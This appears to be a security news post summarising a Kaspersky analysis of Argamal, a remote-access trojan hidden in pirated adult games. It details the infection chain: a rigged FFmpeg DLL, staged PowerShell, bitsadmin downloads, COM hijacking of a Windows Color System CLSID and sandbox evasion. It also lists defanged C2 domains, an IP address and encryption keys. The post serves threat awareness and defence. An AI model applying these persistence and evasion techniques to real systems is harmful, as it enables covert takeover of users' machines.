Hundreds of users—mostly in Russia, Brazil, Germany, and Vietnam—had their machines fully taken over by a new RAT named Argamal, delivered through trojanized hentai games discovered since April 2026. Kaspersky's analysis of the campaign, which appears to have been active since at least 2024, reveals a surprisingly sophisticated infection chain that combines game engine exploitation with multi-stage PowerShell and COM hijacking.
Delivery via Infected FFmpeg DLLs and PowerShell Chains
Attackers distributed the trojanized games through dedicated websites and torrent trackers like AniRena, with downloads hosted on PixelDrain. The archives contained fully functional adult games—built with engines like RenPy (Python) and RPG Maker MV (JavaScript)—alongside a modified FFmpeg DLL. That DLL imports DllGetClassObject from a file called natives2_blob.bin, which is actually a DLL that executes a Base64-encoded PowerShell script (Stage1) when the game loads.
Stage1 checks for sandbox environments (Sandboxie folder, Procmon64 process) before setting persistence. It creates a scheduled task that fires three days later, running a second PowerShell script (Stage2). Stage2 uses bitsadmin.exe to download an encrypted payload (zaesdl.dat) from GitHub repositories (hxxps://github[.]com/gmz159/u, hxxps://github[.]com/DnyP/files, etc.) and decrypts it using AES-CBC with the key zbcd1j9234r670eh. The decrypted payload is saved as a DLL and registered for COM hijacking.
COM Hijacking and Persistence via Windows Color System
The malware replaces the InprocServer32 entry for the Windows Color System Calibration Loader DLL (CLSID {B210D694-C8DF-490D-9576-9E20CDBC20BD}). This scheduled task runs at every user login, so the RAT loads automatically each session. Stage2 cleans up its own artifacts—removes the temporary registry keys under {722D0F89-B69C-4700-AE8C-4A44350E4876}, unsets environment variables MI_V and MI_V2, and deletes the one-time scheduled task.
Full RAT Capabilities Under the Hood
The final payload is a RAT with broad functionality. Earlier versions used a rolling XOR key (0xB0C1D4E9); newer versions employ a substitution cipher with keys like 17htUno/I3L&fK2H#yapE@b5NqZ$Q4xmeF.s96uB>jkdWCPvAgD*XwO:iR~TMrV0YGl8z. The RAT checks for 40+ security tools via tasklist, then sends UDP heartbeats to the C2 (asper1[.]freeddns[.]org early, Winst0[.]kozow[.]com later, both resolving to 186[.]158.223.35 on AS11664). Interestingly, if the user's locale is zh-CN, the malware sets its C2 to country1[.]ignorelist[.]com (which points to 127.0.0.1 until recently—likely avoiding targeting Chinese users suggests the payload may have been developed by a Chinese-speaking actor, though the delivery chain comments are in Spanish).
C2 can switch the RAT to extended TCP mode on port 3747, where commands are encrypted with a fixed substitution cipher. The command set includes file operations (ZIP, TAR, delete), surveillance (screenshots, keystroke injection), system control (reboot, shutdown, execute commands), and reconnaissance (user, OS, drives, Chrome data paths). In short, the attackers can do anything.
I've seen steady updates to Argamal since 2024—new encryption, bug fixes, infrastructure changes. The threat actor behind this campaign isn't going anywhere. Expect more trojanized game variants and smarter evasion techniques aimed at anyone who downloads adult games from untrusted sources.
Source: Argamal: Malware hidden in hentai games
Domain: securelist.com
Comments load interactively on the live page.